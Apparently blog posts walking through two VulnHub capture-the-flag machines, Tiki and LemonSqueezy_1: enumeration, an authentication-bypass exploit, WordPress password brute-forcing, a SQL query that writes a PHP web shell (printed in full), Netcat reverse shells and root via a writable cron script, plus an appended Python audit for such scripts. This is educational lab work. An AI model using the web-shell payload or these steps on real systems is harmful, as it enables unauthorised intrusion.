Saturday, February 19, 2022

Tiki

TIKI

- Layout for this exercise:

1 - INTRODUCTION

- The goal of this exercise is to develop a hacking process for the vulnerable machine Tiki, from the VulnHub pentesting platform.

- Tiki can be downloaded from here:

https://www.vulnhub.com/entry/tiki-1,525/

- Once the virtual machine is downloaded and extracted with VMware:

- By the way, the initial page indicates the existence of user silky:

- Netdiscover gives the IP 192.168.1.42:

2 - ENUMERATION

- Scanning all ports with Nmap:

- Scanning port 80 in more depth and reading robots.txt, we find a folder named /tiki:

- Dirbusting the web server:

- Browsing the web server:

- Going to /tiki, it redirects to /tiki-index.php, where we can access a login form:

- Enumerating with enum4linux, we find user silky and the shared folder Notes:


- Connecting to the shared folder Notes and downloading its content, Mail.txt:

- Reading Mail.txt, we discover some credentials:

3 - EXPLOITATION

- However, these credentials are not enough to SSH into the target:

- Searching for exploits related to Tiki:

- Taking the script 48927.py and copying it to the local working folder:

- Launching the Python script, its output gives us a couple of hints to exploit Tiki:

- So let's use Burp Suite to take advantage of the exploit:

- Intercepting the login credentials admin:admin with Burp:

- Removing the password and turning interception off, the result is that we are logged in as admin:

- Going to the Search tab and finding the Credentials tab, we discover silky:Agy8Y7SPJNXQzqA:

- SSH-ing with the credentials silky:Agy8Y7SPJNXQzqA, we have a shell:

4 - PRIVILEGE ESCALATION

- It is interesting that user silky is part of the group sudo:

- Also, there is the file .sudo_as_admin_successful:

- We are lucky that user silky has full sudoer privileges:

- Finally we get a root shell:

5 - CAPTURING THE FLAG

- Reading flag.txt:

Monday, February 14, 2022

Lemon_Squeezy_1

LEMON SQUEEZY 1

- Layout for this exercise:

1 - INTRODUCTION

- The goal of this exercise is to develop a hacking process for the vulnerable machine LemonSqueezy_1, from the VulnHub pentesting platform.

- LemonSqueezy_1 can be downloaded from here:

https://www.vulnhub.com/entry/lemonsqueezy-1,473/

- Once the virtual machine is downloaded and extracted with VMware:

2 - ENUMERATION

- Scanning with Nmap:


- Browsing the web server:

- Dirbusting the web server, we find /phpmyadmin and /wordpress:

- Going to /phpmyadmin:

- Going to /wordpress:

- Editing /etc/hosts:

- Now lemonsqueezy/wordpress presents the WordPress webpage:

- WPScan scans WordPress, finding the users lemon and orange:

- Adding the users admin, orange and lemon to the text file users.txt:

- WPScan with rockyou.txt finds the password ginger for user orange:

- Logging into WordPress with the credentials orange:ginger:

- Reading the post, we discover the potential password n0t1n@w0rdl1st!:

- Trying phpMyAdmin now with the credentials orange:n0t1n@w0rdl1st!:

- There are 2 password hashes, for lemon and orange:

- Hash-identifier identifies the hashes as MD5 (WordPress); however, after several attempts we were not able to crack them:

3 - EXPLOITATION

- Creating a new table and entering this crafted SQL query, we write the exploit shell.php into the WordPress web root:

SELECT "<?php system($_GET['cmd']); ?>" into outfile "/var/www/html/wordpress/shell.php"

- Now we are able to perform remote code execution through shell.php, for instance running commands like id:

- Also cat /etc/passwd:

- Now let's inject a Netcat reverse shell command back to Kali:

- It works and we have a shell:

4 - PRIVILEGE ESCALATION

- Looking for cron jobs, we find logrotate, which is writable and is run as root:

- Reading logrotate:

- Let's try to edit logrotate by writing an exploit into it.

- First, creating an exploit with Msfvenom:

- Setting a Netcat listener:

- Rewriting logrotate:

- Finally, after waiting for 2 minutes until logrotate is run, we get a root shell:

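The root cause of this escalation is a script that root's cron executes but that other users can modify. As an added example (not part of the original post), the following Python audit parses system-crontab entries (the /etc/crontab and /etc/cron.d style with a user field, an assumption), finds the script each root entry runs, and reports any that are group- or world-writable; the crontab text and the two script files in demo() are constructed in a temporary directory, and only the write bits are checked, not ownership.

```python
import os
import re
import stat
import tempfile

# System crontab format (/etc/crontab, /etc/cron.d/*): five schedule fields, a user, then the command.
CRON_RE = re.compile(r"^\s*(?:\S+\s+){5}(?P<user>\S+)\s+(?P<cmd>.+)$")

def script_path(cmd):
    """First absolute path in the command, i.e. the script cron will execute (None if there is none)."""
    for token in cmd.split():
        if token.startswith("/"):
            return token
    return None

def tamperable(path):
    """Reason a script can be modified by non-owners (group/world write bit), or None if it cannot."""
    mode = stat.S_IMODE(os.stat(path).st_mode)
    if mode & (stat.S_IWGRP | stat.S_IWOTH):
        return "mode %o is group/world writable" % mode
    return None

def audit_crontab(text):
    """Return [(schedule, path, reason)] for root entries whose script another user could rewrite."""
    findings = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue  # blank, comment, or VAR=value line
        m = CRON_RE.match(line)
        if not m or m.group("user") != "root":
            continue
        path = script_path(m.group("cmd"))
        reason = tamperable(path) if path else None
        if reason:
            findings.append((line.split()[0], path, reason))
    return findings

def demo():
    """Constructed sample: a correctly protected script (0755) beside a world-writable one (0777)."""
    d = tempfile.mkdtemp()
    safe, bad = os.path.join(d, "backup.sh"), os.path.join(d, "logrotate")
    for p, mode in ((safe, 0o755), (bad, 0o777)):
        with open(p, "w") as f:
            f.write("#!/bin/sh\n")
        os.chmod(p, mode)
    crontab = "SHELL=/bin/sh\n0 3 * * * root %s\n*/2 * * * * root %s >/dev/null 2>&1\n" % (safe, bad)
    return audit_crontab(crontab)
```

On a real host, feed audit_crontab() the contents of /etc/crontab and each file under /etc/cron.d; an entry like the 2-minute logrotate job above is exactly what it flags.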
5 - CAPTURING THE FLAG

- Reading root.txt: